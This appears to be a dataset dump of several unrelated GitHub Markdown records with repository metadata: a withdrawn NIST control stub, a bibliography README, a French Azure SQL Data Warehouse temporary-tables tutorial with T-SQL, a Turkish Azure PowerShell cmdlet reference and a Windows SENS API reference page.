#NIST-800-53-PL-5 ##Privacy Impact Assessment #### Description "[Withdrawn: Incorporated into Appendix J, AR-2]." No information found for the combination of standard NIST-800-53 and control PL-5
32.666667
81
0.765306
eng_Latn
0.8478
5389860642d645ff86ee55ce6cc7f70d97eaf2cc
1,564
md
Markdown
README.md
hhergeth/Light-Transport-Bibliography
b0ce00a4288ce652beaa183ab04af2b2d2f19528
[ "Unlicense" ]
4
2018-02-15T09:41:27.000Z
2018-10-23T19:19:26.000Z
README.md
hhergeth/Light-Transport-Bibliography
b0ce00a4288ce652beaa183ab04af2b2d2f19528
[ "Unlicense" ]
null
null
null
README.md
hhergeth/Light-Transport-Bibliography
b0ce00a4288ce652beaa183ab04af2b2d2f19528
[ "Unlicense" ]
null
null
null
# Light-Transport-Bibliography A bibtex bibliography of papers, books and theses focusing on the topic of Light Transport Simulation. ### Usage The bibliography can be used in LaTeX as any other would: ``` % in header of main.tex \usepackage[backend=biber, style=ieee]{biblatex} \addbibresource{lib_Books.bib} \addbibresource{lib_Papers.bib} ... % document contents ... \printbibliography ``` ### Style This bibtex library for Light Transport Simulation combines the citation key style and the convenience of Google Scholar, with the entry completeness provided by other digital libraries. Most of the entries featured in this library were extracted from the ACM Digital Library, the Wiley Online Library, and Springer Link. A few entries were created/modified by hand to fix issues and mistakes. A custom script was used to ensure that all entries were formatted in the same style (e.g. indentations, braces), which allows for better visual parsing. In this library, braces are used instead of quotation marks; to avoid dependency on the automatic expansion, all *month* entries are given as integers. In general, we seek to embed as much information as possible into each entry; however, we do deliberately omit the abstract of each paper. ### Collaboration In case you notice any errors, inaccuracies or missing information please let me know via an issue! The same holds if you think that there are important papers missing. I'm very happy to add entries given that they are related to the topic. It may just take me a few days to read the suggested paper.
68
699
0.794118
eng_Latn
0.997707
5389872103f891625a962f34ac769a10c8301229
10,790
md
Markdown
articles/sql-data-warehouse/sql-data-warehouse-tables-temporary.md
CatchRetry/azure-docs.fr-fr
1ccd071caa483cc19d4d9b8c1c59104b1a7e6438
[ "CC-BY-4.0" ]
null
null
null
articles/sql-data-warehouse/sql-data-warehouse-tables-temporary.md
CatchRetry/azure-docs.fr-fr
1ccd071caa483cc19d4d9b8c1c59104b1a7e6438
[ "CC-BY-4.0" ]
null
null
null
articles/sql-data-warehouse/sql-data-warehouse-tables-temporary.md
CatchRetry/azure-docs.fr-fr
1ccd071caa483cc19d4d9b8c1c59104b1a7e6438
[ "CC-BY-4.0" ]
3
2020-03-31T11:56:12.000Z
2021-06-04T06:51:19.000Z
--- title: Tables temporaires dans SQL Data Warehouse | Microsoft Docs description: Conseils de base pour l’utilisation des tables temporaires et mise en évidence des principes des tables temporaires au niveau de la session. services: sql-data-warehouse author: ronortloff manager: craigg ms.service: sql-data-warehouse ms.topic: conceptual ms.subservice: implement ms.date: 04/17/2018 ms.author: rortloff ms.reviewer: igorstan ms.openlocfilehash: db13064c93381f87f82959ed3386abfc0a8e4593 ms.sourcegitcommit: 898b2936e3d6d3a8366cfcccc0fccfdb0fc781b4 ms.translationtype: HT ms.contentlocale: fr-FR ms.lasthandoff: 01/30/2019 ms.locfileid: "55238660" --- # <a name="temporary-tables-in-sql-data-warehouse"></a>Tables temporaires dans SQL Data Warehouse Cet article contient des conseils de base pour l’utilisation des tables temporaires et met en évidence les principes des tables temporaires au niveau de la session. L’utilisation des informations de cet article peut vous aider à modulariser votre code, et à améliorer sa réutilisabilité et sa facilité de maintenance. ## <a name="what-are-temporary-tables"></a>Qu’est-ce que les tables temporaires ? Les tables temporaires sont utiles lors du traitement des données, notamment lors d’une transformation, lorsque les résultats intermédiaires sont temporaires. Les tables temporaires se trouvent au niveau de la session dans SQL Data Warehouse. Elles sont uniquement visibles dans la session dans laquelle elles ont été créées et sont automatiquement supprimées lorsque cette session se déconnecte. Les tables temporaires offrent un gain de performances, car leurs résultats sont écrits en local et non dans un stockage distant. Dans Azure SQL Data Warehouse, les tables temporaires diffèrent légèrement par rapport à la base de données SQL Azure, car elles sont accessibles à partir de tout point à l’intérieur de la session, notamment à l’intérieur et à l’extérieur d’une procédure stockée. ## <a name="create-a-temporary-table"></a>Créer une table temporaire Les tables temporaires sont créées en faisant simplement précéder le nom de votre table de `#`. Par exemple : ```sql CREATE TABLE #stats_ddl ( [schema_name] NVARCHAR(128) NOT NULL , [table_name] NVARCHAR(128) NOT NULL , [stats_name] NVARCHAR(128) NOT NULL , [stats_is_filtered] BIT NOT NULL , [seq_nmbr] BIGINT NOT NULL , [two_part_name] NVARCHAR(260) NOT NULL , [three_part_name] NVARCHAR(400) NOT NULL ) WITH ( DISTRIBUTION = HASH([seq_nmbr]) , HEAP ) ``` Vous pouvez également utiliser `CTAS` pour créer des tables temporaires à l’aide de la même approche : ```sql CREATE TABLE #stats_ddl WITH ( DISTRIBUTION = HASH([seq_nmbr]) , HEAP ) AS ( SELECT sm.[name] AS [schema_name] , tb.[name] AS [table_name] , st.[name] AS [stats_name] , st.[has_filter] AS [stats_is_filtered] , ROW_NUMBER() OVER(ORDER BY (SELECT NULL)) AS [seq_nmbr] , QUOTENAME(sm.[name])+'.'+QUOTENAME(tb.[name]) AS [two_part_name] , QUOTENAME(DB_NAME())+'.'+QUOTENAME(sm.[name])+'.'+QUOTENAME(tb.[name]) AS [three_part_name] FROM sys.objects AS ob JOIN sys.stats AS st ON ob.[object_id] = st.[object_id] JOIN sys.stats_columns AS sc ON st.[stats_id] = sc.[stats_id] AND st.[object_id] = sc.[object_id] JOIN sys.columns AS co ON sc.[column_id] = co.[column_id] AND sc.[object_id] = co.[object_id] JOIN sys.tables AS tb ON co.[object_id] = tb.[object_id] JOIN sys.schemas AS sm ON tb.[schema_id] = sm.[schema_id] WHERE 1=1 AND st.[user_created] = 1 GROUP BY sm.[name] , tb.[name] , st.[name] , st.[filter_definition] , st.[has_filter] ) SELECT CASE @update_type WHEN 1 THEN 'UPDATE STATISTICS '+[two_part_name]+'('+[stats_name]+');' WHEN 2 THEN 'UPDATE STATISTICS '+[two_part_name]+'('+[stats_name]+') WITH FULLSCAN;' WHEN 3 THEN 'UPDATE STATISTICS '+[two_part_name]+'('+[stats_name]+') WITH SAMPLE '+CAST(@sample_pct AS VARCHAR(20))+' PERCENT;' WHEN 4 THEN 'UPDATE STATISTICS '+[two_part_name]+'('+[stats_name]+') WITH RESAMPLE;' END AS [update_stats_ddl] , [seq_nmbr] FROM t1 ; ``` > [!NOTE] > `CTAS` est une commande puissante et présente l’avantage d’être efficace dans son utilisation de l’espace de journal des transactions. > > ## <a name="dropping-temporary-tables"></a>Suppression de tables temporaires Lorsqu’une nouvelle session est créée, aucune table temporaire ne doit exister. Toutefois, si vous appelez la même procédure stockée, qui crée une table temporaire avec le même nom, pour vous assurer de la réussite de vos instructions `CREATE TABLE`, une simple vérification d’existence préalable avec `DROP` peut être utilisée comme dans l’exemple suivant : ```sql IF OBJECT_ID('tempdb..#stats_ddl') IS NOT NULL BEGIN DROP TABLE #stats_ddl END ``` Pour la cohérence de codage, il convient d’utiliser ce modèle pour les tables et les tables temporaires. Il est également judicieux d’utiliser `DROP TABLE` pour supprimer les tables temporaires lorsque vous avez terminé de les utiliser dans votre code. Dans le développement de procédure stockée, il est courant de voir les commandes de suppression regroupées ensemble à la fin d’une procédure pour s’assurer que ces objets sont nettoyés. ```sql DROP TABLE #stats_ddl ``` ## <a name="modularizing-code"></a>Modularisation du code Étant donné que les tables temporaires peuvent être affichées depuis n’importe quel point d’une session utilisateur, cela peut vous aider à modulariser votre code d’application. Par exemple, la procédure stockée suivante génère le langage DDL pour mettre à jour toutes les statistiques dans la base de données par nom de statistique. ```sql CREATE PROCEDURE [dbo].[prc_sqldw_update_stats] ( @update_type tinyint -- 1 default 2 fullscan 3 sample 4 resample ,@sample_pct tinyint ) AS IF @update_type NOT IN (1,2,3,4) BEGIN; THROW 151000,'Invalid value for @update_type parameter. Valid range 1 (default), 2 (fullscan), 3 (sample) or 4 (resample).',1; END; IF @sample_pct IS NULL BEGIN; SET @sample_pct = 20; END; IF OBJECT_ID('tempdb..#stats_ddl') IS NOT NULL BEGIN DROP TABLE #stats_ddl END CREATE TABLE #stats_ddl WITH ( DISTRIBUTION = HASH([seq_nmbr]) ) AS ( SELECT sm.[name] AS [schema_name] , tb.[name] AS [table_name] , st.[name] AS [stats_name] , st.[has_filter] AS [stats_is_filtered] , ROW_NUMBER() OVER(ORDER BY (SELECT NULL)) AS [seq_nmbr] , QUOTENAME(sm.[name])+'.'+QUOTENAME(tb.[name]) AS [two_part_name] , QUOTENAME(DB_NAME())+'.'+QUOTENAME(sm.[name])+'.'+QUOTENAME(tb.[name]) AS [three_part_name] FROM sys.objects AS ob JOIN sys.stats AS st ON ob.[object_id] = st.[object_id] JOIN sys.stats_columns AS sc ON st.[stats_id] = sc.[stats_id] AND st.[object_id] = sc.[object_id] JOIN sys.columns AS co ON sc.[column_id] = co.[column_id] AND sc.[object_id] = co.[object_id] JOIN sys.tables AS tb ON co.[object_id] = tb.[object_id] JOIN sys.schemas AS sm ON tb.[schema_id] = sm.[schema_id] WHERE 1=1 AND st.[user_created] = 1 GROUP BY sm.[name] , tb.[name] , st.[name] , st.[filter_definition] , st.[has_filter] ) SELECT CASE @update_type WHEN 1 THEN 'UPDATE STATISTICS '+[two_part_name]+'('+[stats_name]+');' WHEN 2 THEN 'UPDATE STATISTICS '+[two_part_name]+'('+[stats_name]+') WITH FULLSCAN;' WHEN 3 THEN 'UPDATE STATISTICS '+[two_part_name]+'('+[stats_name]+') WITH SAMPLE '+CAST(@sample_pct AS VARCHAR(20))+' PERCENT;' WHEN 4 THEN 'UPDATE STATISTICS '+[two_part_name]+'('+[stats_name]+') WITH RESAMPLE;' END AS [update_stats_ddl] , [seq_nmbr] FROM t1 ; GO ``` À ce stade, la seule action qui s’est produite est la création d’une procédure stockée qui génére une table temporaire, #stats_ddl, avec des instructions DDL. Cette procédure stockée abandonne la table #stats_ddl si elle existe déjà pour assurer l’absence d’échec en cas d’exécutions multiples dans une session. Toutefois, étant donné l’absence de `DROP TABLE` à la fin de la procédure stockée, lorsque la procédure stockée se termine, elle quitte la table créée afin de pouvoir être lue en dehors de la procédure stockée. Dans SQL Data Warehouse, contrairement à d’autres bases de données SQL, il est possible d’utiliser la table temporaire en dehors de la procédure qui l’a créée. Les tables temporaires SQL Data Warehouse peuvent être utilisées à **n’importe quel point** de la session. Cela peut optimiser la facilité de gestion et la modularité du code comme dans l’exemple suivant : ```sql EXEC [dbo].[prc_sqldw_update_stats] @update_type = 1, @sample_pct = NULL; DECLARE @i INT = 1 , @t INT = (SELECT COUNT(*) FROM #stats_ddl) , @s NVARCHAR(4000) = N'' WHILE @i <= @t BEGIN SET @s=(SELECT update_stats_ddl FROM #stats_ddl WHERE seq_nmbr = @i); PRINT @s EXEC sp_executesql @s SET @i+=1; END DROP TABLE #stats_ddl; ``` ## <a name="temporary-table-limitations"></a>Limitations relatives aux tables temporaires SQL Data Warehouse impose quelques restrictions lors de l’implémentation de tables temporaires. Actuellement, seules les tables temporaires de la session sont prises en charge. Les tables temporaires globales ne sont pas prises en charge. En outre, vous ne pouvez pas créer de vues sur des tables temporaires. ## <a name="next-steps"></a>Étapes suivantes Pour en savoir plus sur le développement des tables, consultez la [Vue d’ensemble de la Table](sql-data-warehouse-tables-overview.md).
48.38565
892
0.646061
fra_Latn
0.617307
53899be6c675d479a1fd0967a999ea217465025c
3,143
md
Markdown
azps-3.8.0/Az.Network/New-AzApplicationGatewayFirewallPolicyManagedRule.md
AdrianaDJ/azure-docs-powershell.tr-TR
78407d14f64e877506d6c0c14cac18608332c7a8
[ "CC-BY-4.0", "MIT" ]
1
2020-12-05T17:58:35.000Z
2020-12-05T17:58:35.000Z
azps-3.8.0/Az.Network/New-AzApplicationGatewayFirewallPolicyManagedRule.md
AdrianaDJ/azure-docs-powershell.tr-TR
78407d14f64e877506d6c0c14cac18608332c7a8
[ "CC-BY-4.0", "MIT" ]
null
null
null
azps-3.8.0/Az.Network/New-AzApplicationGatewayFirewallPolicyManagedRule.md
AdrianaDJ/azure-docs-powershell.tr-TR
78407d14f64e877506d6c0c14cac18608332c7a8
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- external help file: Microsoft.Azure.PowerShell.Cmdlets.Network.dll-Help.xml Module Name: Az.Network online version: https://docs.microsoft.com/en-us/powershell/module/az.network/new-azapplicationgatewayfirewallpolicymanagedrule schema: 2.0.0 content_git_url: https://github.com/Azure/azure-powershell/blob/master/src/Network/Network/help/New-AzApplicationGatewayFirewallPolicyManagedRule.md original_content_git_url: https://github.com/Azure/azure-powershell/blob/master/src/Network/Network/help/New-AzApplicationGatewayFirewallPolicyManagedRule.md ms.openlocfilehash: 6b709283024a37d85bfac89f7e2fec4448544729 ms.sourcegitcommit: 6a91b4c545350d316d3cf8c62f384478e3f3ba24 ms.translationtype: MT ms.contentlocale: tr-TR ms.lasthandoff: 04/21/2020 ms.locfileid: "94104816" --- # New-AzApplicationGatewayFirewallPolicyManagedRule ## SYNOPSIS Güvenlik duvarı ilkesi için ManagedRules oluşturma. ## INDEKI ``` New-AzApplicationGatewayFirewallPolicyManagedRule [-ManagedRuleSet <PSApplicationGatewayFirewallPolicyManagedRuleSet[]>] [-Exclusion <PSApplicationGatewayFirewallPolicyExclusion[]>] [-DefaultProfile <IAzureContextContainer>] [<CommonParameters>] ``` ## Tanım **Yeni-AzApplicationGatewayFirewallPolicyManagedRule** , güvenlik duvarı ilkesi için yönetilen kurallar oluşturur. ## ÖRNEKLERDEN ### Örnek 1 ```powershell PS C:\> $condition = New-AzApplicationGatewayFirewallPolicyManagedRule -ManagedRuleSet $managedRuleSet -Exclusion $exclusion1,$exclusion2 ``` Bu komut, $managedRuleSet içeren bir ManagedRuleSet listesi ve girdileri $exclusion 1, $exclusion 2 olan bir dışlama listesi oluşturur. ## PARAMETRELERINE ### -DefaultProfile Azure ile iletişim için kullanılan kimlik bilgileri, hesap, kiracı ve abonelik. ```yaml Type: Microsoft.Azure.Commands.Common.Authentication.Abstractions.Core.IAzureContextContainer Parameter Sets: (All) Aliases: AzContext, AzureRmContext, AzureCredential Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -Dışlama Dışlama girdisinin listesi. ```yaml Type: Microsoft.Azure.Commands.Network.Models.PSApplicationGatewayFirewallPolicyExclusion[] Parameter Sets: (All) Aliases: Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -ManagedRuleSet Yönetilen ruleSets 'in listesi. ```yaml Type: Microsoft.Azure.Commands.Network.Models.PSApplicationGatewayFirewallPolicyManagedRuleSet[] Parameter Sets: (All) Aliases: Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### CommonParameters Bu cmdlet ortak parametreleri destekler:-Debug,-ErrorAction,-ErrorVariable,-ınformationaction,-ınformationvariable,-OutVariable,-OutBuffer,-Pipelinedeğişken,-verbose,-WarningAction ve-Warningdeğişken. Daha fazla bilgi için [about_CommonParameters](http://go.microsoft.com/fwlink/?LinkID=113216)bakın. ## GÖLGELENDIRICI ### Yabilirsiniz ## ÇıKıŞLAR ### Microsoft. Azure. Commands. Network. modeller. PSApplicationGatewayFirewallPolicyManagedRules ## NOTLARıNDA ## ILGILI BAĞLANTıLAR
30.813725
300
0.821508
yue_Hant
0.439342
538aa77409c2ae8935be00349d98ae448d4c1cf4
3,063
md
Markdown
sdk-api-src/content/sensevts/nf-sensevts-isenslogon2-sessionreconnect.md
amorilio/sdk-api
54ef418912715bd7df39c2561fbc3d1dcef37d7e
[ "CC-BY-4.0", "MIT" ]
null
null
null
sdk-api-src/content/sensevts/nf-sensevts-isenslogon2-sessionreconnect.md
amorilio/sdk-api
54ef418912715bd7df39c2561fbc3d1dcef37d7e
[ "CC-BY-4.0", "MIT" ]
null
null
null
sdk-api-src/content/sensevts/nf-sensevts-isenslogon2-sessionreconnect.md
amorilio/sdk-api
54ef418912715bd7df39c2561fbc3d1dcef37d7e
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- UID: NF:sensevts.ISensLogon2.SessionReconnect title: ISensLogon2::SessionReconnect (sensevts.h) description: The session was reconnected. The SessionReconnect method is used when you reconnect to a Fast User Switching session or a Remote Desktop Connection. This is different from logging on to a new session. helpviewer_keywords: ["ISensLogon2 interface [SENS]","SessionReconnect method","ISensLogon2.SessionReconnect","ISensLogon2::SessionReconnect","SessionReconnect","SessionReconnect method [SENS]","SessionReconnect method [SENS]","ISensLogon2 interface","_zaw_isenslogon2_sessionreconnect","sens.isenslogon2_sessionreconnect","sensevts/ISensLogon2::SessionReconnect","syncmgr.isenslogon2_sessionreconnect"] old-location: sens\isenslogon2_sessionreconnect.htm tech.root: Sens ms.assetid: b789a75d-e842-40b4-9e8d-b9374b5ba6b0 ms.date: 12/05/2018 ms.keywords: ISensLogon2 interface [SENS],SessionReconnect method, ISensLogon2.SessionReconnect, ISensLogon2::SessionReconnect, SessionReconnect, SessionReconnect method [SENS], SessionReconnect method [SENS],ISensLogon2 interface, _zaw_isenslogon2_sessionreconnect, sens.isenslogon2_sessionreconnect, sensevts/ISensLogon2::SessionReconnect, syncmgr.isenslogon2_sessionreconnect req.header: sensevts.h req.include-header: req.target-type: Windows req.target-min-winverclnt: Windows XP [desktop apps only] req.target-min-winversvr: Windows Server 2003 [desktop apps only] req.kmdf-ver: req.umdf-ver: req.ddi-compliance: req.unicode-ansi: req.idl: req.max-support: req.namespace: req.assembly: req.type-library: Sensevts.tlb req.lib: req.dll: Sens.dll req.irql: targetos: Windows req.typenames: req.redist: ms.custom: 19H1 f1_keywords: - ISensLogon2::SessionReconnect - sensevts/ISensLogon2::SessionReconnect dev_langs: - c++ topic_type: - APIRef - kbSyntax api_type: - COM api_location: - Sens.dll api_name: - ISensLogon2.SessionReconnect --- # ISensLogon2::SessionReconnect ## -description The session was reconnected. The <b>SessionReconnect</b> method is used when you reconnect to a Fast User Switching session or a Remote Desktop Connection. This is different from logging on to a new session. ## -parameters ### -param bstrUserName [in] Name of the current user. ### -param dwSessionId [in] The session identifier of the session. ## -returns This method can return one of these values. <table> <tr> <th>Return code</th> <th>Description</th> </tr> <tr> <td width="40%"> <dl> <dt><b>S_OK</b></dt> </dl> </td> <td width="60%"> Method returned successfully. </td> </tr> </table> ## -remarks SENS calls this method to notify your application that the session was reconnected. ## -see-also <a href="/windows/desktop/Sens/about-system-event-notification-service">About System Event Notification Service</a> <a href="/windows/desktop/api/sensevts/nn-sensevts-isenslogon2">ISensLogon2</a> <a href="/windows/desktop/api/sensevts/nf-sensevts-isenslogon-logoff">ISensLogon::Logoff</a> <a href="/windows/desktop/TermServ/terminal-services-portal">Terminal Services</a>
28.896226
403
0.78224
eng_Latn
0.549706
538aea0a0100eeaa6d476657d350ee115c830326
233
md
Markdown
README.md
lestatleon/fs_front
7820948e4c1440af3b3af13645cbc0780391dc3c
[ "MIT" ]
null
null
null
README.md
lestatleon/fs_front
7820948e4c1440af3b3af13645cbc0780391dc3c
[ "MIT" ]
null
null
null
README.md
lestatleon/fs_front
7820948e4c1440af3b3af13645cbc0780391dc3c
[ "MIT" ]
null
null
null
# FrontEnd project ## About Front This FrontEnd application was completely developed with Angular5 ## License This FrontEnd project is open-sourced software licensed under the [MIT license](http://opensource.org/licenses/MIT).
19.416667
116
0.785408
eng_Latn
0.992531
538b9a7f39c24fcae444e91208ddc73a5efb3b1b
11,730
md
Markdown
articles/active-directory-b2c/technical-profiles-overview.md
eltociear/azure-docs.fr-fr
3302b8be75f0872cf7d7a5e264850849ac36e493
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/active-directory-b2c/technical-profiles-overview.md
eltociear/azure-docs.fr-fr
3302b8be75f0872cf7d7a5e264850849ac36e493
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/active-directory-b2c/technical-profiles-overview.md
eltociear/azure-docs.fr-fr
3302b8be75f0872cf7d7a5e264850849ac36e493
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Vue d’ensemble des profils techniques dans les stratégies personnalisées titleSuffix: Azure AD B2C description: Découvrez comment les profils techniques sont utilisés dans une stratégie personnalisée dans Azure Active Directory B2C. services: active-directory-b2c author: msmimart manager: celestedg ms.service: active-directory ms.workload: identity ms.topic: reference ms.date: 03/20/2020 ms.author: mimart ms.subservice: B2C ms.openlocfilehash: 125d89301e9d2cc3fc863bffb9b9e6c41e0c129e ms.sourcegitcommit: 58faa9fcbd62f3ac37ff0a65ab9357a01051a64f ms.translationtype: HT ms.contentlocale: fr-FR ms.lasthandoff: 04/28/2020 ms.locfileid: "82229933" --- # <a name="about-technical-profiles-in-azure-active-directory-b2c-custom-policies"></a>À propos des profils techniques dans les stratégies personnalisées d’Azure Active Directory B2C [!INCLUDE [active-directory-b2c-advanced-audience-warning](../../includes/active-directory-b2c-advanced-audience-warning.md)] Un profil technique fournit une infrastructure avec un mécanisme intégré pour communiquer avec différents types de parties au moyen d’une stratégie personnalisée dans Azure Active Directory B2C (Azure AD B2C). Les profils techniques sont utilisés pour communiquer avec votre locataire Azure AD B2C, créer un utilisateur ou lire un profil utilisateur. Un profil technique peut être déclaré automatiquement pour permettre l’interaction avec l’utilisateur. Par exemple, collecter les informations d’identification de l’utilisateur pour se connecter, puis afficher la page d’inscription ou la page de réinitialisation du mot de passe. ## <a name="type-of-technical-profiles"></a>Types de profils techniques Un profil technique permet les types de scénarios suivants : - [Application Insights](application-insights-technical-profile.md) - Envoi de données d’événement à [Application Insights](../azure-monitor/app/app-insights-overview.md). - [Azure Active Directory](active-directory-technical-profile.md) : fournit une assistance pour la gestion des utilisateurs Azure Active Directory B2C. - [Azure Multi-Factor Authentication](multi-factor-auth-technical-profile.md) : gère la vérification d’un numéro de téléphone à l’aide d’Azure Multi-Factor Authentication (MFA). - [Transformation de revendications](claims-transformation-technical-profile.md) : appelle les transformations de revendications de sortie pour manipuler les valeurs de revendications, valider des revendications ou définir des valeurs par défaut pour un ensemble de revendications de sortie. - [Émetteur de jeton JWT](jwt-issuer-technical-profile.md) : émet un jeton JWT qui est retourné à l’application par partie de confiance. - [OAuth1](oauth1-technical-profile.md) : fédération avec n’importe quel fournisseur d’identité du protocole OAuth 1.0. - [OAuth2](oauth2-technical-profile.md) : fédération avec n’importe quel fournisseur d’identité du protocole OAuth 2.0. - [Mot de passe à usage unique](one-time-password-technical-profile.md) : prend en charge la gestion de la génération et de la vérification d’un mot de passe à usage unique. - [OpenID Connect](openid-connect-technical-profile.md) : fédération avec n'importe quel fournisseur d'identité du protocole OpenID Connect. - [Facteur de téléphone](phone-factor-technical-profile.md) : prise en charge de l’inscription et de la vérification des numéros de téléphone. - [Fournisseur RESTful](restful-technical-profile.md) : appel aux services d'API REST, comme la validation de l'entrée utilisateur, l'enrichissement des données utilisateur ou l'intégration avec les applications métier. - [Fournisseur d’identité SAML](saml-identity-provider-technical-profile.md) : fédération avec n’importe quel fournisseur d’identité du protocole SAML. - [Émetteur de jeton SAML](saml-issuer-technical-profile.md) : émet un jeton SAML qui est retourné à l’application par partie de confiance. - [Autodéclaré](self-asserted-technical-profile.md) : interaction avec l’utilisateur. Par exemple, collecter les informations d’identification de l’utilisateur pour se connecter, afficher la page d’inscription ou la réinitialisation du mot de passe. - [Gestion des sessions](custom-policy-reference-sso.md) : gère différents types de sessions. ## <a name="technical-profile-flow"></a>Flux du profil technique Tous les types de profils techniques partagent le même concept. Vous pouvez envoyer des revendications d’entrée, exécuter la transformation des revendications et communiquer avec le tiers configuré, comme un fournisseur d’identité, une API REST ou les services d’annuaire Azure AD. Au terme du processus, le profil technique retourne les revendications de sortie et peut exécuter la transformation des revendications de sortie. Le schéma suivant explique comment sont traités les transformations et les mappages référencés dans le profil technique. Quel que soit le tiers avec qui le profil technique interagit, une fois la transformation des revendications exécutée, les revendications de sortie du profil technique sont immédiatement stockées dans le conteneur de revendications. ![Schéma illustrant le workflow du profil technique](./media/technical-profiles-overview/technical-profile-idp-saml-flow.png)   1. **Gestion de session d’authentification unique (SSO)**  : restaure l’état de session du profil technique à l’aide de la [gestion de session d’authentification unique](custom-policy-reference-sso.md). 1. **Transformation des revendications d’entrée** : les revendications d’entrée de chaque [transformation de revendications](claimstransformations.md) d’entrée sont récupérées auprès du conteneur de revendications. Les revendications de sortie d’une transformation des revendications d’entrée peuvent être des revendications d’entrée d’une transformation de revendications d’entrée ultérieure. 1. **Revendications d’entrée** : les revendications sont récupérées auprès du conteneur de revendications et sont utilisées pour le profil technique. Par exemple, un [profil technique autodéclaré](self-asserted-technical-profile.md) utilise les revendications d’entrée pour préremplir les revendications de sortie fournies par l’utilisateur. Un profil technique d’API REST utilise les revendications d’entrée pour envoyer les paramètres d’entrée au point de terminaison de l’API REST. Azure Active Directory utilise la revendication d’entrée comme identificateur unique pour lire, mettre à jour ou supprimer un compte. 1. **Exécution du profil technique** : le profil technique échange les revendications avec le tiers configuré. Par exemple : - Redirigez l’utilisateur vers le fournisseur d’identité pour finaliser la connexion. Une fois connecté, l’utilisateur revient et l’exécution du profil technique se poursuit. - Appelez une API REST tout en envoyant les paramètres en tant que InputClaims et récupérant les informations en tant que OutputClaims. - Créez ou mettez à jour le compte d’utilisateur. - Envoie et vérifie le message texte MFA. 1. **Profils techniques de validation** : un [profil technique autodéclaré](self-asserted-technical-profile.md) peut appeler des [profils techniques de validation](validation-technical-profile.md). Le profil technique de validation valide les données profilées par l’utilisateur et renvoie un message d’erreur ou OK, avec ou sans revendications de sortie. Par exemple, avant qu’Azure AD B2C ne crée un nouveau compte, il vérifie si l’utilisateur existe déjà dans les services d’annuaire. Vous pouvez appeler un profil technique d’API REST pour ajouter votre propre logique métier.<p>La portée des revendications de sortie d’un profil technique de validation se limite au profil technique qui appelle le profil technique de validation, ainsi qu’aux autres profils techniques de validation sous le même profil technique. Si vous souhaitez utiliser les revendications de sortie à l’étape d’orchestration suivante, vous devez ajouter les revendications de sortie sur le profil technique qui invoque le profil technique de validation. 1. **Revendications de sortie** : les revendications sont renvoyées au conteneur de revendications. Vous pouvez utiliser ces revendications dans la prochaine étape d’orchestration, ou dans les transformations de revendications de sortie. 1. **Transformations des revendications de sortie** : les revendications d’entrée de chaque [transformation de revendications](claimstransformations.md) de sortie sont récupérées auprès du conteneur de revendications. Les revendications de sortie du profil technique des étapes précédentes peuvent être des revendications d’entrée d’une transformation de revendications de sortie. Après l’exécution, les revendications de sortie sont replacées dans le conteneur de revendications. Les revendications de sortie d’une transformation de revendications d’entrée peuvent également être des revendications d’entrée d’une transformation de revendications de sortie ultérieure. 1. **Gestion de session d’authentification unique (SSO)**  : conserve les données du profil technique dans la session à l’aide de la [gestion de session d’authentification unique](custom-policy-reference-sso.md). ## <a name="technical-profile-inclusion"></a>Éléments inclus dans le profil technique Un profil technique peut inclure un autre profil technique pour modifier des paramètres ou ajouter de nouvelles fonctionnalités. L’élément `IncludeTechnicalProfile` est une référence au profil technique de base dont est dérivé un profil technique. Le nombre de niveaux n’est pas limité. Par exemple, le profil technique **AAD-UserReadUsingAlternativeSecurityId-NoError** inclut le profil **AAD-UserReadUsingAlternativeSecurityId**. Ce profil technique définit l’élément de métadonnées `RaiseErrorIfClaimsPrincipalDoesNotExist` sur `true`, et génère une erreur si aucun compte de réseau social ne figure dans l’annuaire. **AAD-UserReadUsingAlternativeSecurityId-NoError** remplace ce comportement et désactive ce message d’erreur. ```XML <TechnicalProfile Id="AAD-UserReadUsingAlternativeSecurityId-NoError"> <Metadata> <Item Key="RaiseErrorIfClaimsPrincipalDoesNotExist">false</Item> </Metadata> <IncludeTechnicalProfile ReferenceId="AAD-UserReadUsingAlternativeSecurityId" /> </TechnicalProfile> ``` **AAD-UserReadUsingAlternativeSecurityId** inclut le profil technique `AAD-Common`. ```XML <TechnicalProfile Id="AAD-UserReadUsingAlternativeSecurityId"> <Metadata> <Item Key="Operation">Read</Item> <Item Key="RaiseErrorIfClaimsPrincipalDoesNotExist">true</Item> <Item Key="UserMessageIfClaimsPrincipalDoesNotExist">User does not exist. Please sign up before you can sign in.</Item> </Metadata> <InputClaims> <InputClaim ClaimTypeReferenceId="AlternativeSecurityId" PartnerClaimType="alternativeSecurityId" Required="true" /> </InputClaims> <OutputClaims> <OutputClaim ClaimTypeReferenceId="objectId" /> <OutputClaim ClaimTypeReferenceId="userPrincipalName" /> <OutputClaim ClaimTypeReferenceId="displayName" /> <OutputClaim ClaimTypeReferenceId="otherMails" /> <OutputClaim ClaimTypeReferenceId="givenName" /> <OutputClaim ClaimTypeReferenceId="surname" /> </OutputClaims> <IncludeTechnicalProfile ReferenceId="AAD-Common" /> </TechnicalProfile> ``` Ni **AAD-UserReadUsingAlternativeSecurityId-NoError** ni **AAD-UserReadUsingAlternativeSecurityId** ne spécifie l’élément **Protocole** requis, car celui-ci est spécifié dans le profil technique **AAD-Common**. ```XML <TechnicalProfile Id="AAD-Common"> <DisplayName>Azure Active Directory</DisplayName> <Protocol Name="Proprietary" Handler="Web.TPEngine.Providers.AzureActiveDirectoryProvider, Web.TPEngine, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" /> ... </TechnicalProfile> ```
102
1,029
0.808781
fra_Latn
0.932519
538bdb0dc4b28fed8211df5c05024cf2e6fd5bdc
3,184
md
Markdown
docs/relational-databases/performance/create-a-plan-guide-for-parameterized-queries.md
masashimi/sql-docs.ja-jp
8d7b348348f377b8b1621da72311554cfd003fae
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/relational-databases/performance/create-a-plan-guide-for-parameterized-queries.md
masashimi/sql-docs.ja-jp
8d7b348348f377b8b1621da72311554cfd003fae
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/relational-databases/performance/create-a-plan-guide-for-parameterized-queries.md
